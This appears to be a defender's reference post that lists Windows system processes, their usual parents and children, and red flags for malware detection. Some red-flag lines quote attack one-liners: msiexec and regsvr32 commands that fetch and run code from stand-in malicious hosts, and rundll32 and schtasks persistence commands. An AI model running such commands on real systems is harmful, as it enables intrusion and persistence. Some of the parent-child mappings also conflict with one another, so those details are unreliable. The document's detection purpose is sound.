🔹 Windows System Processes

Understanding parent-child process relationships is crucial for system monitoring, malware analysis, and forensic investigations. Here are some important processes and their typical parent-child

🔹 Windows System Processes

1️⃣ System Idle Process (PID 0)

• Parent: None (it is created by the Windows kernel)

• Child: None (does not spawn any processes)

• Purpose: Represents unused CPU resources; does not execute code.

2️⃣ System Process (PID 4)

• Parent: None (created by the Windows Kernel)

• Child: Handles low-level kernel processes like drivers.

• Purpose: Manages hardware interactions and kernel operations.

3️⃣ smss.exe (Session Manager Subsystem)

• Parent: System (PID 4)

• Child: winlogon.exe, csrss.exe

• Purpose: Manages system sessions, initializes the registry, and starts critical system processes.

4️⃣ csrss.exe (Client/Server Runtime Subsystem)

• Parent: smss.exe

• Child: None

• Purpose: Handles console windows, GUI elements, and thread creation.

5️⃣ wininit.exe (Windows Initialization Process)

• Parent: smss.exe

• Child: services.exe, lsass.exe

• Purpose: Initializes system services during boot-up.

6️⃣ services.exe (Service Control Manager)

• Parent: wininit.exe

• Child: Various Windows services (svchost.exe, spoolsv.exe, etc.)

• Purpose: Manages Windows services.

7️⃣ lsass.exe (Local Security Authority Subsystem)

• Parent: wininit.exe

• Child: None (but can be targeted for credential dumping)

• Purpose: Manages authentication and security policies.

8️⃣ explorer.exe (Windows Explorer)

• Parent: winlogon.exe

• Child: cmd.exe, notepad.exe, chrome.exe (user-launched apps)

• Purpose: Provides the desktop, taskbar, and file browsing interface.

9️⃣ cmd.exe (Command Prompt)

• Parent: explorer.exe (when opened by a user)

• Child: powershell.exe, whoami.exe, etc.

• Purpose: Runs command-line instructions.

🔟 powershell.exe

• Parent: cmd.exe or explorer.exe

• Child: Various scripts or executables.

• Purpose: Executes PowerShell scripts and commands.

1️⃣1️⃣ rundll32.exe

• Parent: explorer.exe, cmd.exe

• Child: Can execute malicious DLLs if misused.

• Purpose: Loads and executes DLL files.

1️⃣2️⃣ wmiprvse.exe (WMI Provider Host)

• Parent: services.exe

• Child: Various WMI queries

• Purpose: Executes WMI scripts for system management.

1️⃣3️⃣ taskhost.exe / taskhostw.exe

• Parent: services.exe

• Child: Hosts dynamic Windows services.

• Purpose: Executes DLL-based services.

🔹 Additional Critical Windows Processes

1️⃣ winlogon.exe (Windows Logon Application)

• Parent: smss.exe

• Child: userinit.exe, explorer.exe

• Purpose: Handles user login, logoff, and lock screen.

• Red Flags: Malware can inject into winlogon.exe for persistence (e.g., Winlogon Registry Notification abuse).

---

2️⃣ userinit.exe

• Parent: winlogon.exe

• Child: explorer.exe, cmd.exe

• Purpose: Runs after login, initializes user environment.

• Red Flags: If replaced by malware, it can execute malicious scripts on login.

---

3️⃣ explorer.exe

• Parent: userinit.exe

• Child: User-launched apps (chrome.exe, notepad.exe, etc.)

• Purpose: Handles the desktop, taskbar, and file browsing.

• Red Flags: If explorer.exe spawns cmd.exe or powershell.exe, it could indicate script execution or malware activity.

---

4️⃣ msiexec.exe (Windows Installer)

• Parent: explorer.exe or services.exe

• Child: Can spawn installation processes.

• Purpose: Handles the installation of .msi files.

• Red Flags: Attackers can use msiexec.exe for LOLBin (Living Off the Land Binaries) execution (msiexec.exe /q /i http://malicious-url.com/malware.msi).

---

5️⃣ wscript.exe & cscript.exe (Windows Scripting Hosts)

• Parent: explorer.exe, cmd.exe

• Child: Script execution (.vbs, .js).

• Purpose: Executes VBScript (wscript.exe) and command-line scripts (cscript.exe).

• Red Flags: Often used by malware for fileless attacks.

---

6️⃣ rundll32.exe

• Parent: explorer.exe, cmd.exe

• Child: Loads DLLs.

• Purpose: Executes functions in DLLs.

• Red Flags: Attackers use it to execute malware-laden DLLs (rundll32.exe malware.dll, Start).

---

7️⃣ regsvr32.exe (Registry Server)

• Parent: cmd.exe, explorer.exe

• Child: Registers/Unregisters COM DLLs.

• Purpose: Registers system DLLs.

• Red Flags: Used in Squiblydoo Attack to bypass defenses (regsvr32 /s /n /u /i:http://malicious.com/file.sct scrobj.dll).

---

8️⃣ conhost.exe (Console Window Host)

• Parent: cmd.exe, explorer.exe

• Child: powershell.exe, notepad.exe

• Purpose: Provides console window support.

• Red Flags: If conhost is running in unusual locations (C:\Users\Public\conhost.exe), it might be malware.

---

9️⃣ dllhost.exe (COM Surrogate)

• Parent: explorer.exe

• Child: Handles DLL-based processes.

• Purpose: Supports COM objects execution.

• Red Flags: If running without an associated process, it may be malware (dllhost.exe used for Process Hollowing).

---

🔟 werfault.exe (Windows Error Reporting)

• Parent: services.exe

• Child: None (Handles error reporting).

• Purpose: Collects error reports and crash dumps.

• Red Flags: Attackers can disable werfault.exe to prevent crash reports from being logged.

---

1️⃣1️⃣ consent.exe (UAC Prompt)

• Parent: winlogon.exe

• Child: Elevates processes requiring Admin rights.

• Purpose: Handles UAC prompts.

• Red Flags: If bypassed, attackers can escalate privileges.

---

1️⃣2️⃣ taskeng.exe (Task Scheduler Engine)

• Parent: services.exe

• Child: Scheduled tasks.

• Purpose: Executes scheduled tasks.

• Red Flags: Used in persistence (schtasks.exe /create /tn Backdoor /tr "C:\malware.exe").